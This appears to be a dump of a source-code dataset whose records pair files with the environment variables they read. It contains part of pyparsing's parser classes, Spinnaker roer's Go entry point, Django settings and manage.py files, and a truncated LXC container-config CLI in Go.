fwd_expr << (a | b | c)
Converting to use the ``'<<='`` operator instead will avoid this problem.
See :class:`ParseResults.pprint` for an example of a recursive
parser created using ``Forward``.
"""
def __init__(self, other: OptionalType[Union[ParserElement, str]] = None):
self.caller_frame = traceback.extract_stack(limit=2)[0]
super().__init__(other, savelist=False)
self.lshift_line = None
def __lshift__(self, other):
if hasattr(self, "caller_frame"):
del self.caller_frame
if isinstance(other, str_type):
other = self._literalStringClass(other)
self.expr = other
self.mayIndexError = self.expr.mayIndexError
self.mayReturnEmpty = self.expr.mayReturnEmpty
self.set_whitespace_chars(
self.expr.whiteChars, copy_defaults=self.expr.copyDefaultWhiteChars
)
self.skipWhitespace = self.expr.skipWhitespace
self.saveAsList = self.expr.saveAsList
self.ignoreExprs.extend(self.expr.ignoreExprs)
self.lshift_line = traceback.extract_stack(limit=2)[-2]
return self
def __ilshift__(self, other):
return self << other
def __or__(self, other):
caller_line = traceback.extract_stack(limit=2)[-2]
if (
__diag__.warn_on_match_first_with_lshift_operator
and caller_line == self.lshift_line
and Diagnostics.warn_on_match_first_with_lshift_operator
not in self.suppress_warnings_
):
warnings.warn(
"using '<<' operator with '|' is probably an error, use '<<='",
stacklevel=2,
)
ret = super().__or__(other)
return ret
def __del__(self):
# see if we are getting dropped because of '=' reassignment of var instead of '<<=' or '<<'
if (
self.expr is None
and __diag__.warn_on_assignment_to_Forward
and Diagnostics.warn_on_assignment_to_Forward not in self.suppress_warnings_
):
warnings.warn_explicit(
"Forward defined here but no expression attached later using '<<=' or '<<'",
UserWarning,
filename=self.caller_frame.filename,
lineno=self.caller_frame.lineno,
)
def parseImpl(self, instring, loc, doActions=True):
if (
self.expr is None
and __diag__.warn_on_parse_using_empty_Forward
and Diagnostics.warn_on_parse_using_empty_Forward
not in self.suppress_warnings_
):
# walk stack until parse_string, scan_string, search_string, or transform_string is found
parse_fns = [
"parse_string",
"scan_string",
"search_string",
"transform_string",
]
tb = traceback.extract_stack(limit=200)
for i, frm in enumerate(reversed(tb), start=1):
if frm.name in parse_fns:
stacklevel = i + 1
break
else:
stacklevel = 2
warnings.warn(
"Forward expression was never assigned a value, will not parse any input",
stacklevel=stacklevel,
)
if not ParserElement._left_recursion_enabled:
return super().parseImpl(instring, loc, doActions)
# ## Bounded Recursion algorithm ##
# Recursion only needs to be processed at ``Forward`` elements, since they are
# the only ones that can actually refer to themselves. The general idea is
# to handle recursion stepwise: We start at no recursion, then recurse once,
# recurse twice, ..., until more recursion offers no benefit (we hit the bound).
#
# The "trick" here is that each ``Forward`` gets evaluated in two contexts
# - to *match* a specific recursion level, and
# - to *search* the bounded recursion level
# and the two run concurrently. The *search* must *match* each recursion level
# to find the best possible match. This is handled by a memo table, which
# provides the previous match to the next level match attempt.
#
# See also "Left Recursion in Parsing Expression Grammars", Medeiros et al.
#
# There is a complication since we not only *parse* but also *transform* via
# actions: We do not want to run the actions too often while expanding. Thus,
# we expand using `doActions=False` and only run `doActions=True` if the next
# recursion level is acceptable.
with ParserElement.recursion_lock:
memo = ParserElement.recursion_memos
try:
# we are parsing at a specific recursion expansion - use it as-is
prev_loc, prev_result = memo[loc, self, doActions]
if isinstance(prev_result, Exception):
raise prev_result
return prev_loc, prev_result.copy()
except KeyError:
act_key = (loc, self, True)
peek_key = (loc, self, False)
# we are searching for the best recursion expansion - keep on improving
# both `doActions` cases must be tracked separately here!
prev_loc, prev_peek = memo[peek_key] = (
loc - 1,
ParseException(
instring, loc, "Forward recursion without base case", self
),
)
if doActions:
memo[act_key] = memo[peek_key]
while True:
try:
new_loc, new_peek = super().parseImpl(instring, loc, False)
except ParseException:
# we failed before getting any match – do not hide the error
if isinstance(prev_peek, Exception):
raise
new_loc, new_peek = prev_loc, prev_peek
# the match did not get better: we are done
if new_loc <= prev_loc:
if doActions:
# replace the match for doActions=False as well,
# in case the action did backtrack
prev_loc, prev_result = memo[peek_key] = memo[act_key]
del memo[peek_key], memo[act_key]
return prev_loc, prev_result.copy()
del memo[peek_key]
return prev_loc, prev_peek.copy()
# the match did get better: see if we can improve further
else:
if doActions:
try:
memo[act_key] = super().parseImpl(instring, loc, True)
except ParseException as e:
memo[peek_key] = memo[act_key] = (new_loc, e)
raise
prev_loc, prev_peek = memo[peek_key] = new_loc, new_peek
def leave_whitespace(self, recursive=True):
self.skipWhitespace = False
return self
def ignore_whitespace(self, recursive=True):
self.skipWhitespace = True
return self
def streamline(self):
if not self.streamlined:
self.streamlined = True
if self.expr is not None:
self.expr.streamline()
return self
def validate(self, validateTrace=None):
if validateTrace is None:
validateTrace = []
if self not in validateTrace:
tmp = validateTrace[:] + [self]
if self.expr is not None:
self.expr.validate(tmp)
self._checkRecursion([])
def _generateDefaultName(self):
# Avoid infinite recursion by setting a temporary _defaultName
self._defaultName = ": ..."
# Use the string representation of main expression.
retString = "..."
try:
if self.expr is not None:
retString = str(self.expr)[:1000]
else:
retString = "None"
finally:
return self.__class__.__name__ + ": " + retString
def copy(self):
if self.expr is not None:
return super().copy()
else:
ret = Forward()
ret <<= self
return ret
def _setResultsName(self, name, list_all_matches=False):
if (
__diag__.warn_name_set_on_empty_Forward
and Diagnostics.warn_name_set_on_empty_Forward
not in self.suppress_warnings_
):
if self.expr is None:
warnings.warn(
"{}: setting results name {!r} on {} expression "
"that has no contained expression".format(
"warn_name_set_on_empty_Forward", name, type(self).__name__
),
stacklevel=3,
)
return super()._setResultsName(name, list_all_matches)
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class TokenConverter(ParseElementEnhance):
"""
Abstract subclass of :class:`ParseExpression`, for converting parsed results.
"""
def __init__(self, expr: Union[ParserElement, str], savelist=False):
super().__init__(expr) # , savelist)
self.saveAsList = False
class Combine(TokenConverter):
"""Converter to concatenate all matching tokens to a single string.
By default, the matching patterns must also be contiguous in the
input string; this can be disabled by specifying
``'adjacent=False'`` in the constructor.
Example::
real = Word(nums) + '.' + Word(nums)
print(real.parse_string('3.1416')) # -> ['3', '.', '1416']
# will also erroneously match the following
print(real.parse_string('3. 1416')) # -> ['3', '.', '1416']
real = Combine(Word(nums) + '.' + Word(nums))
print(real.parse_string('3.1416')) # -> ['3.1416']
# no match when there are internal spaces
print(real.parse_string('3. 1416')) # -> Exception: Expected W:(0123...)
"""
def __init__(
self,
expr: ParserElement,
join_string: str = "",
adjacent: bool = True,
*,
joinString: OptionalType[str] = None,
):
super().__init__(expr)
joinString = joinString if joinString is not None else join_string
# suppress whitespace-stripping in contained parse expressions, but re-enable it on the Combine itself
if adjacent:
self.leave_whitespace()
self.adjacent = adjacent
self.skipWhitespace = True
self.joinString = joinString
self.callPreparse = True
def ignore(self, other):
if self.adjacent:
ParserElement.ignore(self, other)
else:
super().ignore(other)
return self
def postParse(self, instring, loc, tokenlist):
retToks = tokenlist.copy()
del retToks[:]
retToks += ParseResults(
["".join(tokenlist._asStringList(self.joinString))], modal=self.modalResults
)
if self.resultsName and retToks.haskeys():
return [retToks]
else:
return retToks
class Group(TokenConverter):
"""Converter to return the matched tokens as a list - useful for
returning tokens of :class:`ZeroOrMore` and :class:`OneOrMore` expressions.
The optional ``aslist`` argument when set to True will return the
parsed tokens as a Python list instead of a pyparsing ParseResults.
Example::
ident = Word(alphas)
num = Word(nums)
term = ident | num
func = ident + Opt(delimited_list(term))
print(func.parse_string("fn a, b, 100"))
# -> ['fn', 'a', 'b', '100']
func = ident + Group(Opt(delimited_list(term)))
print(func.parse_string("fn a, b, 100"))
# -> ['fn', ['a', 'b', '100']]
"""
def __init__(self, expr: ParserElement, aslist: bool = False):
super().__init__(expr)
self.saveAsList = True
self._asPythonList = aslist
def postParse(self, instring, loc, tokenlist):
if self._asPythonList:
return ParseResults.List(
tokenlist.asList()
if isinstance(tokenlist, ParseResults)
else list(tokenlist)
)
else:
return [tokenlist]
class Dict(TokenConverter):
"""Converter to return a repetitive expression as a list, but also
as a dictionary. Each element can also be referenced using the first
token in the expression as its key. Useful for tabular report
scraping when the first column can be used as a item key.
The optional ``asdict`` argument when set to True will return the
parsed tokens as a Python dict instead of a pyparsing ParseResults.
Example::
data_word = Word(alphas)
label = data_word + FollowedBy(':')
text = "shape: SQUARE posn: upper left color: light blue texture: burlap"
attr_expr = (label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
# print attributes as plain groups
print(OneOrMore(attr_expr).parse_string(text).dump())
# instead of OneOrMore(expr), parse using Dict(OneOrMore(Group(expr))) - Dict will auto-assign names
result = Dict(OneOrMore(Group(attr_expr))).parse_string(text)
print(result.dump())
# access named fields as dict entries, or output as dict
print(result['shape'])
print(result.as_dict())
prints::
['shape', 'SQUARE', 'posn', 'upper left', 'color', 'light blue', 'texture', 'burlap']
[['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'light blue'], ['texture', 'burlap']]
- color: light blue
- posn: upper left
- shape: SQUARE
- texture: burlap
SQUARE
{'color': 'light blue', 'posn': 'upper left', 'texture': 'burlap', 'shape': 'SQUARE'}
See more examples at :class:`ParseResults` of accessing fields by results name.
"""
def __init__(self, expr: ParserElement, asdict: bool = False):
super().__init__(expr)
self.saveAsList = True
self._asPythonDict = asdict
def postParse(self, instring, loc, tokenlist):
for i, tok in enumerate(tokenlist):
if len(tok) == 0:
continue
ikey = tok[0]
if isinstance(ikey, int):
ikey = str(ikey).strip()
if len(tok) == 1:
tokenlist[ikey] = _ParseResultsWithOffset("", i)
elif len(tok) == 2 and not isinstance(tok[1], ParseResults):
tokenlist[ikey] = _ParseResultsWithOffset(tok[1], i)
else:
try:
dictvalue = tok.copy() # ParseResults(i)
except Exception:
exc = TypeError(
"could not extract dict values from parsed results"
" - Dict expression must contain Grouped expressions"
)
raise exc from None
del dictvalue[0]
if len(dictvalue) != 1 or (
isinstance(dictvalue, ParseResults) and dictvalue.haskeys()
):
tokenlist[ikey] = _ParseResultsWithOffset(dictvalue, i)
else:
tokenlist[ikey] = _ParseResultsWithOffset(dictvalue[0], i)
if self._asPythonDict:
return [tokenlist.as_dict()] if self.resultsName else tokenlist.as_dict()
else:
return [tokenlist] if self.resultsName else tokenlist
class Suppress(TokenConverter):
"""Converter for ignoring the results of a parsed expression.
Example::
source = "a, b, c,d"
wd = Word(alphas)
wd_list1 = wd + ZeroOrMore(',' + wd)
print(wd_list1.parse_string(source))
# often, delimiters that are useful during parsing are just in the
# way afterward - use Suppress to keep them out of the parsed output
wd_list2 = wd + ZeroOrMore(Suppress(',') + wd)
print(wd_list2.parse_string(source))
# Skipped text (using '...') can be suppressed as well
source = "lead in START relevant text END trailing text"
start_marker = Keyword("START")
end_marker = Keyword("END")
find_body = Suppress(...) + start_marker + ... + end_marker
print(find_body.parse_string(source)
prints::
['a', ',', 'b', ',', 'c', ',', 'd']
['a', 'b', 'c', 'd']
['START', 'relevant text ', 'END']
(See also :class:`delimited_list`.)
"""
def __init__(self, expr: Union[ParserElement, str], savelist: bool = False):
if expr is ...:
expr = _PendingSkip(NoMatch())
super().__init__(expr)
def __add__(self, other):
if isinstance(self.expr, _PendingSkip):
return Suppress(SkipTo(other)) + other
else:
return super().__add__(other)
def __sub__(self, other):
if isinstance(self.expr, _PendingSkip):
return Suppress(SkipTo(other)) - other
else:
return super().__sub__(other)
def postParse(self, instring, loc, tokenlist):
return []
def suppress(self):
return self
def trace_parse_action(f: ParseAction):
"""Decorator for debugging parse actions.
When the parse action is called, this decorator will print
``">> entering method-name(line:<current_source_line>, <parse_location>, <matched_tokens>)"``.
When the parse action completes, the decorator will print
``"<<"`` followed by the returned value, or any exception that the parse action raised.
Example::
wd = Word(alphas)
@trace_parse_action
def remove_duplicate_chars(tokens):
return ''.join(sorted(set(''.join(tokens))))
wds = OneOrMore(wd).set_parse_action(remove_duplicate_chars)
print(wds.parse_string("slkdjs sld sldd sdlf sdljf"))
prints::
>>entering remove_duplicate_chars(line: 'slkdjs sld sldd sdlf sdljf', 0, (['slkdjs', 'sld', 'sldd', 'sdlf', 'sdljf'], {}))
<<leaving remove_duplicate_chars (ret: 'dfjkls')
['dfjkls']
"""
f = _trim_arity(f)
def z(*paArgs):
thisFunc = f.__name__
s, l, t = paArgs[-3:]
if len(paArgs) > 3:
thisFunc = paArgs[0].__class__.__name__ + "." + thisFunc
sys.stderr.write(
">>entering {}(line: {!r}, {}, {!r})\n".format(thisFunc, line(l, s), l, t)
)
try:
ret = f(*paArgs)
except Exception as exc:
sys.stderr.write("<<leaving {} (exception: {})\n".format(thisFunc, exc))
raise
sys.stderr.write("<<leaving {} (ret: {!r})\n".format(thisFunc, ret))
return ret
z.__name__ = f.__name__
return z
# convenience constants for positional expressions
empty = Empty().set_name("empty")
line_start = LineStart().set_name("line_start")
line_end = LineEnd().set_name("line_end")
string_start = StringStart().set_name("string_start")
string_end = StringEnd().set_name("string_end")
_escapedPunc = Word(_bslash, r"\[]-*.$+^?()~ ", exact=2).set_parse_action(
lambda s, l, t: t[0][1]
)
_escapedHexChar = Regex(r"\\0?[xX][0-9a-fA-F]+").set_parse_action(
lambda s, l, t: chr(int(t[0].lstrip(r"\0x"), 16))
)
_escapedOctChar = Regex(r"\\0[0-7]+").set_parse_action(
lambda s, l, t: chr(int(t[0][1:], 8))
)
_singleChar = (
_escapedPunc | _escapedHexChar | _escapedOctChar | CharsNotIn(r"\]", exact=1)
)
_charRange = Group(_singleChar + Suppress("-") + _singleChar)
_reBracketExpr = (
Literal("[")
+ Opt("^").set_results_name("negate")
+ Group(OneOrMore(_charRange | _singleChar)).set_results_name("body")
+ "]"
)
def srange(s):
r"""Helper to easily define string ranges for use in :class:`Word`
construction. Borrows syntax from regexp ``'[]'`` string range
definitions::
srange("[0-9]") -> "0123456789"
srange("[a-z]") -> "abcdefghijklmnopqrstuvwxyz"
srange("[a-z$_]") -> "abcdefghijklmnopqrstuvwxyz$_"
The input string must be enclosed in []'s, and the returned string
is the expanded character set joined into a single string. The
values enclosed in the []'s may be:
- a single character
- an escaped character with a leading backslash (such as ``\-``
or ``\]``)
- an escaped hex character with a leading ``'\x'``
(``\x21``, which is a ``'!'`` character) (``\0x##``
is also supported for backwards compatibility)
- an escaped octal character with a leading ``'\0'``
(``\041``, which is a ``'!'`` character)
- a range of any of the above, separated by a dash (``'a-z'``,
etc.)
- any combination of the above (``'aeiouy'``,
``'a-zA-Z0-9_$'``, etc.)
"""
_expanded = (
lambda p: p
if not isinstance(p, ParseResults)
else "".join(chr(c) for c in range(ord(p[0]), ord(p[1]) + 1))
)
try:
return "".join(_expanded(part) for part in _reBracketExpr.parse_string(s).body)
except Exception:
return ""
def token_map(func, *args):
"""Helper to define a parse action by mapping a function to all
elements of a :class:`ParseResults` list. If any additional args are passed,
they are forwarded to the given function as additional arguments
after the token, as in
``hex_integer = Word(hexnums).set_parse_action(token_map(int, 16))``,
which will convert the parsed data to an integer using base 16.
Example (compare the last to example in :class:`ParserElement.transform_string`::
hex_ints = OneOrMore(Word(hexnums)).set_parse_action(token_map(int, 16))
hex_ints.run_tests('''
00 11 22 aa FF 0a 0d 1a
''')
upperword = Word(alphas).set_parse_action(token_map(str.upper))
OneOrMore(upperword).run_tests('''
my kingdom for a horse
''')
wd = Word(alphas).set_parse_action(token_map(str.title))
OneOrMore(wd).set_parse_action(' '.join).run_tests('''
now is the winter of our discontent made glorious summer by this sun of york
''')
prints::
00 11 22 aa FF 0a 0d 1a
[0, 17, 34, 170, 255, 10, 13, 26]
my kingdom for a horse
['MY', 'KINGDOM', 'FOR', 'A', 'HORSE']
now is the winter of our discontent made glorious summer by this sun of york
['Now Is The Winter Of Our Discontent Made Glorious Summer By This Sun Of York']
"""
def pa(s, l, t):
return [func(tokn, *args) for tokn in t]
func_name = getattr(func, "__name__", getattr(func, "__class__").__name__)
pa.__name__ = func_name
return pa
def autoname_elements():
"""
Utility to simplify mass-naming of parser elements, for
generating railroad diagram with named subdiagrams.
"""
for name, var in sys._getframe().f_back.f_locals.items():
if isinstance(var, ParserElement) and not var.customName:
var.set_name(name)
dbl_quoted_string = Combine(
Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*') + '"'
).set_name("string enclosed in double quotes")
sgl_quoted_string = Combine(
Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*") + "'"
).set_name("string enclosed in single quotes")
quoted_string = Combine(
Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*') + '"'
| Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\(?:[^x]|x[0-9a-fA-F]+)))*") + "'"
).set_name("quotedString using single or double quotes")
unicode_string = Combine("u" + quoted_string.copy()).set_name("unicode string literal")
alphas8bit = srange(r"[\0xc0-\0xd6\0xd8-\0xf6\0xf8-\0xff]")
punc8bit = srange(r"[\0xa1-\0xbf\0xd7\0xf7]")
# build list of built-in expressions, for future reference if a global default value
# gets updated
_builtin_exprs = [v for v in vars().values() if isinstance(v, ParserElement)]
# backward compatibility names
tokenMap = token_map
conditionAsParseAction = condition_as_parse_action
nullDebugAction = null_debug_action
sglQuotedString = sgl_quoted_string
dblQuotedString = dbl_quoted_string
quotedString = quoted_string
unicodeString = unicode_string
lineStart = line_start
lineEnd = line_end
stringStart = string_start
stringEnd = string_end
traceParseAction = trace_parse_action
| []
| []
| [
"PYPARSINGENABLEALLWARNINGS"
]
| [] | ["PYPARSINGENABLEALLWARNINGS"] | python | 1 | 0 | |
cmd/roer/main.go | package main
import (
"os"
"github.com/sirupsen/logrus"
"github.com/spinnaker/roer/cmd"
"github.com/spinnaker/roer/spinnaker"
)
// version is set via ldflags
var version = "dev"
func main() {
// TODO rz - Don't really like this bit. Standardize a spinnaker config file.
// maybe worthwhile splitting out this spinnaker API into a standard lib...
if os.Getenv("SPINNAKER_API") == "" {
logrus.Fatal("SPINNAKER_API must be set")
}
config := spinnaker.ClientConfig{
Endpoint: os.Getenv("SPINNAKER_API"),
HTTPClientFactory: spinnaker.DefaultHTTPClientFactory,
}
if err := cmd.NewRoer(version, config).Run(os.Args); err != nil {
os.Exit(1)
}
}
| [
"\"SPINNAKER_API\"",
"\"SPINNAKER_API\""
]
| []
| [
"SPINNAKER_API"
]
| [] | ["SPINNAKER_API"] | go | 1 | 0 | |
spotify/settings/base.py | import logging.config
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = int(os.environ.get("DEBUG", default=0))
# 'DJANGO_ALLOWED_HOSTS' should be a single string of hosts with a space between each.
# For example: 'DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1]'
ALLOWED_HOSTS = os.environ.get("DJANGO_ALLOWED_HOSTS").split(" ")
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"debug_toolbar",
"spotify_app",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = "spotify_project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [os.path.join(BASE_DIR, "templates")],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"spotify_app.api_endpoints.user_context",
],
},
},
]
WSGI_APPLICATION = "spotify_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": os.environ.get("SQL_ENGINE", "django.db.backends.postgresql"),
"NAME": os.environ.get("SQL_DATABASE", "spotify"),
"USER": os.environ.get("SQL_USER", "postgres"),
"PASSWORD": os.environ.get("SQL_PASSWORD", "postgres"),
"HOST": os.environ.get("SQL_HOST", "localhost"),
"PORT": os.environ.get("SQL_PORT", 5432),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator", },
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator", },
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator", },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "Europe/Warsaw"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = "/static/"
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATIC_ROOT = BASE_DIR + "static"
INTERNAL_IPS = [
"127.0.0.1",
]
LOGGING_CONFIG = None
logging.config.dictConfig(
{
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"console": {"format": '%(asctime)s %(name)-12s %(levelname)-8s %(message)s', },
},
"handlers": {
"console": {"class": "logging.StreamHandler", "formatter": "console", },
},
"loggers": {'spotify_app': {"level": "DEBUG", "handlers": ["console"]}, },
}
)
| []
| []
| [
"SQL_PASSWORD",
"SQL_ENGINE",
"SQL_HOST",
"SQL_DATABASE",
"SQL_USER",
"SECRET_KEY",
"SQL_PORT",
"DEBUG",
"DJANGO_ALLOWED_HOSTS"
]
| [] | ["SQL_PASSWORD", "SQL_ENGINE", "SQL_HOST", "SQL_DATABASE", "SQL_USER", "SECRET_KEY", "SQL_PORT", "DEBUG", "DJANGO_ALLOWED_HOSTS"] | python | 9 | 0 | |
backend/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "root.settings.dev")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
lxc/config.go | package main
import (
"fmt"
"io/ioutil"
"os"
"os/exec"
"strings"
"github.com/gosexy/gettext"
"github.com/lxc/lxd"
"github.com/lxc/lxd/shared"
"gopkg.in/yaml.v2"
)
type configCmd struct {
httpAddr string
}
func (c *configCmd) showByDefault() bool {
return true
}
var profileEditHelp string = gettext.Gettext(
"### This is a yaml representation of the profile.\n" +
"### Any line starting with a '# will be ignored.\n" +
"###\n" +
"### A profile consists of a set of configuration items followed by a set of\n" +
"### devices.\n" +
"###\n" +
"### An example would look like:\n" +
"### name: onenic\n" +
"### config:\n" +
"### raw.lxc: lxc.aa_profile=unconfined\n" +
"### devices:\n" +
"### eth0:\n" +
"### nictype: bridged\n" +
"### parent: lxcbr0\n" +
"### type: nic\n" +
"###\n" +
"### Note that the name cannot be changed\n")
func (c *configCmd) usage() string {
return gettext.Gettext(
"Manage configuration.\n" +
"\n" +
"lxc config get <container> key Get configuration key\n" +
"lxc config device add <resource> <name> <type> [key=value]...\n" +
" Add a device to a resource\n" +
"lxc config device list <resource> List devices for resource\n" +
"lxc config device remove <resource> <name> Remove device from resource\n" +
"lxc config profile list [filters] List profiles\n" +
"lxc config profile create <profile> Create profile\n" +
"lxc config profile delete <profile> Delete profile\n" +
"lxc config profile device add <profile> <name> <type> [key=value]...\n" +
" Delete profile\n" +
"lxc config profile edit <profile> Edit profile in external editor\n" +
"lxc config profile device list <profile>\n" +
"lxc config profile device remove <profile> <name>\n" +
"lxc config profile set <profile> <key> <value> Set profile configuration\n" +
"lxc config profile apply <resource> <profile> Apply profile to container\n" +
"lxc config set [remote] password <newpwd> Set admin password\n" +
"lxc config set <container> key [value] Set container configuration key\n" +
"lxc config show <container> Show container configuration\n" +
"lxc config trust list [remote] List all trusted certs.\n" +
"lxc config trust add [remote] [certfile.crt] Add certfile.crt to trusted hosts.\n" +
"lxc config trust remove [remote] [hostname|fingerprint]\n" +
" Remove the cert from trusted hosts.\n")
}
func (c *configCmd) flags() {}
func doSet(config *lxd.Config, args []string) error {
// [[lxc config]] set dakara:c1 limits.memory 200000
remote, container := config.ParseRemoteAndContainer(args[1])
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
key := args[2]
var value string
if len(args) < 4 {
value = ""
} else {
value = args[3]
}
resp, err := d.SetContainerConfig(container, key, value)
if err != nil {
return err
}
return d.WaitForSuccess(resp.Operation)
}
func (c *configCmd) run(config *lxd.Config, args []string) error {
if len(args) < 1 {
return errArgs
}
switch args[0] {
case "unset":
if len(args) < 3 {
return errArgs
}
return doSet(config, args)
case "set":
if len(args) < 2 {
return errArgs
}
if args[1] == "password" {
if len(args) != 3 {
return errArgs
}
password := args[2]
c, err := lxd.NewClient(config, "")
if err != nil {
return err
}
_, err = c.SetRemotePwd(password)
return err
}
if len(args) < 3 {
return errArgs
}
return doSet(config, args)
case "trust":
if len(args) < 2 {
return errArgs
}
switch args[1] {
case "list":
var remote string
if len(args) == 3 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
trust, err := d.CertificateList()
if err != nil {
return err
}
for host, fingerprint := range trust {
fmt.Println(fmt.Sprintf("%s: %s", host, fingerprint))
}
return nil
case "add":
var remote string
if len(args) < 3 {
return fmt.Errorf(gettext.Gettext("No cert provided to add"))
} else if len(args) == 4 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
fname := args[len(args)-1]
cert, err := shared.ReadCert(fname)
if err != nil {
return err
}
name, _ := shared.SplitExt(fname)
return d.CertificateAdd(cert, name)
case "remove":
var remote string
if len(args) < 3 {
return fmt.Errorf(gettext.Gettext("No fingerprint specified."))
} else if len(args) == 4 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
toRemove := args[len(args)-1]
trust, err := d.CertificateList()
if err != nil {
return err
}
/* Try to remove by hostname first. */
for host, fingerprint := range trust {
if host == toRemove {
return d.CertificateRemove(fingerprint)
}
}
return d.CertificateRemove(args[len(args)-1])
default:
return fmt.Errorf(gettext.Gettext("Unkonwn config trust command %s"), args[1])
}
case "show":
if len(args) == 1 {
return fmt.Errorf(gettext.Gettext("Show for server is not yet supported\n"))
}
remote, container := config.ParseRemoteAndContainer(args[1])
if container == "" {
return fmt.Errorf(gettext.Gettext("Show for remotes is not yet supported\n"))
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
resp, err := d.GetContainerConfig(container)
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(resp, "\n"))
return nil
case "get":
if len(args) != 3 {
return errArgs
}
remote, container := config.ParseRemoteAndContainer(args[1])
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
resp, err := d.ContainerStatus(container)
if err != nil {
return err
}
fmt.Printf("%s: %s\n", args[2], resp.Config[args[2]])
return nil
case "profile":
if len(args) < 2 {
return errArgs
}
if args[1] == "list" {
return doProfileList(config, args)
}
if len(args) < 3 {
return errArgs
}
if args[1] == "device" {
return doProfileDevice(config, args)
}
remote, profile := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
switch args[1] {
case "create":
return doProfileCreate(client, profile)
case "delete":
return doProfileDelete(client, profile)
case "edit":
return doProfileEdit(client, profile)
case "apply":
container := profile
switch len(args) {
case 3:
profile = ""
case 4:
profile = args[3]
default:
return errArgs
}
return doProfileApply(client, container, profile)
case "get":
return doProfileGet(client, profile, args[3:])
case "set":
return doProfileSet(client, profile, args[3:])
case "unset":
return doProfileSet(client, profile, args[3:])
case "copy":
return doProfileCopy(config, client, profile, args[3:])
case "show":
return doProfileShow(client, profile)
}
case "device":
if len(args) < 2 {
return errArgs
}
switch args[1] {
case "list":
return deviceList(config, "container", args)
case "add":
return deviceAdd(config, "container", args)
case "remove":
return deviceRm(config, "container", args)
default:
return errArgs
}
default:
return errArgs
}
return errArgs
}
func doProfileCreate(client *lxd.Client, p string) error {
err := client.ProfileCreate(p)
if err == nil {
fmt.Printf(gettext.Gettext("Profile %s created\n"), p)
}
return err
}
func doProfileEdit(client *lxd.Client, p string) error {
profile, err := client.ProfileConfig(p)
if err != nil {
return err
}
editor := os.Getenv("VISUAL")
if editor == "" {
editor = os.Getenv("EDITOR")
if editor == "" {
editor = "vi"
}
}
data, err := yaml.Marshal(&profile)
f, err := ioutil.TempFile("", "lxc_profile_")
if err != nil {
return err
}
fname := f.Name()
if err = f.Chmod(0700); err != nil {
f.Close()
os.Remove(fname)
return err
}
f.Write([]byte(profileEditHelp))
f.Write(data)
f.Close()
defer os.Remove(fname)
cmd := exec.Command(editor, fname)
cmd.Stdin = os.Stdin
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
err = cmd.Run()
if err != nil {
return err
}
contents, err := ioutil.ReadFile(fname)
if err != nil {
return err
}
newdata := shared.ProfileConfig{}
err = yaml.Unmarshal(contents, &newdata)
